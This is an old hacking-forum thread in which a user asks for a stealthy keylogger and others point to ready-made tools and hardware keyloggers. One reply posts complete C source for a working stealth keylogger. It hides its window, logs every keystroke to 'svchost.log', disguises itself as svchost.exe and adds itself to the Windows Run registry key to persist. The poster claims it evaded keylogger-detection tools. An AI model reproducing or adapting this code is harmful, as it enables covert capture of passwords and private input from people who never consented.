Page 1 of 2 12 LastLast
Results 1 to 10 of 14

Thread: Keylogger

  1. #1
    Junior Member
    Join Date
    Jul 2004
    Posts
    19

    Keylogger

    Does anybody know how to write a simple keylogger in C++? I want it to be stealthy and I want it to make a log file in a certain place like "C:\windows\config\log.txt." Can someone please help me?

  2. #2
    King Tutorial-ankhamun
    Join Date
    Jul 2004
    Posts
    897
    How well do you know c++? I would be easier just to use one someone else has already written.

  3. #3
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,885
    There are *tons* of free keylogger apps available on the net. You can be sure that many will be written in C++ and of course will also be configurable.

    If you want to spend some cash, one of my favorites is Iopus ActMon keylogger. I believe they have a trial version out there you can mess with.
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  4. #4
    Do a Google search

    http://students.csci.unt.edu/~jcb0075/KeyLogSrc.jar for example contains a C++ keylogger
    # Now if I ever needed inspiration,
    Right about now where I lose my patience,

  5. #5
    Senior Member
    Join Date
    Jul 2003
    Posts
    634
    Look up winhooks (i think 1 lined replys are pointless, hopefully this stays at 1 line), i2c

  6. #6
    I seem to remember someone finding a small , simple keystroke logger that stores the logs at C:\ksdf.txt on Rishabh Dara's website.
    -n6

  7. #7
    Blast From the Past
    Join Date
    Jan 2003
    Posts
    729
    i found one on this sites archive that installed and copied keystrokes just fine...then u had to run a file to decypher the text it logged....very nifty.....ik97 i believe it was.....becarefull on xp though....little unstable in xp
    its not c++ but its still a good key logger
    work it harder, make it better, do it faster, makes us stronger

  8. #8
    well, i think it is time to come up with mine

    **EDIT**sorry, this is C, not C++, but you can compile it with a C++ compiler though **/EDIT**


    Code:
    /* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * 
    *                                                                                  *
    *  File: SVCHOST.c                                                                 *
    *                                                                                  *
    *  Purpose: a stealth keylogger, writes to file "svchost.log"                      *
    *                                                                                  *       
    *  Usage: compile to svchost.exe, copy to c:\%windir%\ and run it.                 *
    *                                                                                  *
    *  Copyright (C) 2004  Scorpius, scorpius_unknown@yahoo.com, all rights reserved   *
    *                                                                                  *
    *  This program is free software; you can redistribute it and/or                   *
    *  modify it under the terms of the GNU General Public License                     *
    *  as published by the Free Software Foundation; either version 2                  *
    *  of the License, or (at your option) any later version.                          *
    *                                                                                  *
    *  This program is distributed in the hope that it will be useful,                 *
    *  but WITHOUT ANY WARRANTY; without even the implied warranty of                  *
    *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the                   *
    *  GNU General Public License for more details.                                    *
    *                                                                                  *
    *  You should have received a copy of the GNU General Public License               *
    *  along with this program; if not, write to the Free Software                     *
    *  Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.     *
    *                                                                                  *
    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
    
    #include <windows.h>
    #include <stdio.h>
    #include <winuser.h>
    
    #define BUFSIZE 80
    
    int test_key(void);
    int create_key(char *);
    int get_keys(void);
    
    
    int main(void)
    {
        HWND stealth; /*creating stealth (window is not visible)*/
        AllocConsole();
        stealth=FindWindowA("ConsoleWindowClass",NULL);
        ShowWindow(stealth,0);
       
        int test,create;
        test=test_key();/*check if key is available for opening*/
             
        if (test==2)/*create key*/
        {
            char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/
            create=create_key(path);
              
        }
            
       
        int t=get_keys();
        
        return t;
    }  
    
    int get_keys(void)
    {
                short character;
                  while(1)
                  {
                         
                         for(character=8;character<=222;character++)
                         {
                             if(GetAsyncKeyState(character)==-32767)
                             {   
                                 
                                 FILE *file;
                                 file=fopen("svchost.log","a+");
                                 if(file==NULL)
                                 {
                                         return 1;
                                 }            
                                 if(file!=NULL)
                                 {        
                                         if((character>=39)&&(character<=64))
                                         {
                                               fputc(character,file);
                                               fclose(file);
                                               break;
                                         }        
                                         else if((character>64)&&(character<91))
                                         {
                                               character+=32;
                                               fputc(character,file);
                                               fclose(file);
                                               break;
                                         }
                                         else
                                         { 
                                             switch(character)
                                             {
                                                   case VK_SPACE:
                                                   fputc(' ',file);
                                                   fclose(file);
                                                   break;    
                                                   case VK_SHIFT:
                                                   fputs("[SHIFT]",file);
                                                   fclose(file);
                                                   break;                                            
                                                   case VK_RETURN:
                                                   fputs("\n[ENTER]",file);
                                                   fclose(file);
                                                   break;
                                                   case VK_BACK:
                                                   fputs("[BACKSPACE]",file);
                                                   fclose(file);
                                                   break;
                                                   case VK_TAB:
                                                   fputs("[TAB]",file);
                                                   fclose(file);
                                                   break;
                                                   case VK_CONTROL:
                                                   fputs("[CTRL]",file);
                                                   fclose(file);
                                                   break;    
                                                   case VK_DELETE:
                                                   fputs("[DEL]",file);
                                                   fclose(file);
                                                   break;
                                                   case VK_OEM_1:
                                                   fputs("[;:]",file);
                                                   fclose(file);
                                                   break;
                                                   case VK_OEM_2:
                                                   fputs("[/?]",file);
                                                   fclose(file);
                                                   break;
                                                   case VK_OEM_3:
                                                   fputs("[`~]",file);
                                                   fclose(file);
                                                   break;
                                                   case VK_OEM_4:
                                                   fputs("[ [{ ]",file);
                                                   fclose(file);
                                                   break;
                                                   case VK_OEM_5:
                                                   fputs("[\\|]",file);
                                                   fclose(file);
                                                   break;                                
                                                   case VK_OEM_6:
                                                   fputs("[ ]} ]",file);
                                                   fclose(file);
                                                   break;
                                                   case VK_OEM_7:
                                                   fputs("['\"]",file);
                                                   fclose(file);
                                                   break;
                                                   /*case VK_OEM_PLUS:
                                                   fputc('+',file);
                                                   fclose(file);
                                                   break;
                                                   case VK_OEM_COMMA:
                                                   fputc(',',file);
                                                   fclose(file);
                                                   break;
                                                   case VK_OEM_MINUS:
                                                   fputc('-',file);
                                                   fclose(file);
                                                   break;
                                                   case VK_OEM_PERIOD:
                                                   fputc('.',file);
                                                   fclose(file);
                                                   break;*/
                                                   case VK_NUMPAD0:
                                                   fputc('0',file);
                                                   fclose(file);
                                                   break;
                                                   case VK_NUMPAD1:
                                                   fputc('1',file);
                                                   fclose(file);
                                                   break;
                                                   case VK_NUMPAD2:
                                                   fputc('2',file);
                                                   fclose(file);
                                                   break;
                                                   case VK_NUMPAD3:
                                                   fputc('3',file);
                                                   fclose(file);
                                                   break;
                                                   case VK_NUMPAD4:
                                                   fputc('4',file);
                                                   fclose(file);
                                                   break;
                                                   case VK_NUMPAD5:
                                                   fputc('5',file);
                                                   fclose(file);
                                                   break;
                                                   case VK_NUMPAD6:
                                                   fputc('6',file);
                                                   fclose(file);
                                                   break;
                                                   case VK_NUMPAD7:
                                                   fputc('7',file);
                                                   fclose(file);
                                                   break;
                                                   case VK_NUMPAD8:
                                                   fputc('8',file);
                                                   fclose(file);
                                                   break;
                                                   case VK_NUMPAD9:
                                                   fputc('9',file);
                                                   fclose(file);
                                                   break;
                                                   case VK_CAPITAL:
                                                   fputs("[CAPS LOCK]",file);
                                                   fclose(file);
                                                   break;
                                                   default:
                                                   fclose(file);
                                                   break;
                                            }        
                                       }    
                                  }        
                        }    
                    }                  
                         
                }
                return EXIT_SUCCESS;                            
    }                                                 
    
    int test_key(void)
    {
        int check;
        HKEY hKey;
        char path[BUFSIZE];
        DWORD buf_length=BUFSIZE;
        int reg_key;
        
        reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
        if(reg_key!=0)
        {    
            check=1;
            return check;
        }        
               
        reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);
        
        if((reg_key!=0)||(buf_length>BUFSIZE))
            check=2;
        if(reg_key==0)
            check=0;
             
        RegCloseKey(hKey);
        return check;   
    }
       
    int create_key(char *path)
    {   
            int reg_key,check;
            
            HKEY hkey;
            
            reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
            if(reg_key==0)
            {
                    RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
                    check=0;
                    return check;
            }
            if(reg_key!=0)
                    check=1;
                    
            return check;
    }
    one disadvantage:

    it uses to much cpu resources, although you wouldn't notice it while working on the system (except in the taskmgr). .

    i've written this for my own usage, i wasn't planning on getting it out of the open (merely cause i don't want it to be noticed by keylogger killers etc.). but what the heck, haven't used it once since i wrote it

    hope this helps you...

  9. #9
    Banned
    Join Date
    Jul 2001
    Posts
    1,100
    Greetings:

    In this day and age it's getting more and more difficult to use software keyloggers without them being detected by a spyware remover, antivirus, etc. etc.

    I've always been fond of hardware keyloggers, personally. They're what the feds have been using for a looong time.

    Here's one of the cheaper versions that's available to the general public:

    http://www.keyghost.com/

  10. #10
    Greetings:

    In this day and age it's getting more and more difficult to use software keyloggers without them being detected by a spyware remover, antivirus, etc. etc.
    well, i've tested mine with several keylogger killers, and none of them found it...

    (although i know it is nothing special, so it should be possible to find it easily ).

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •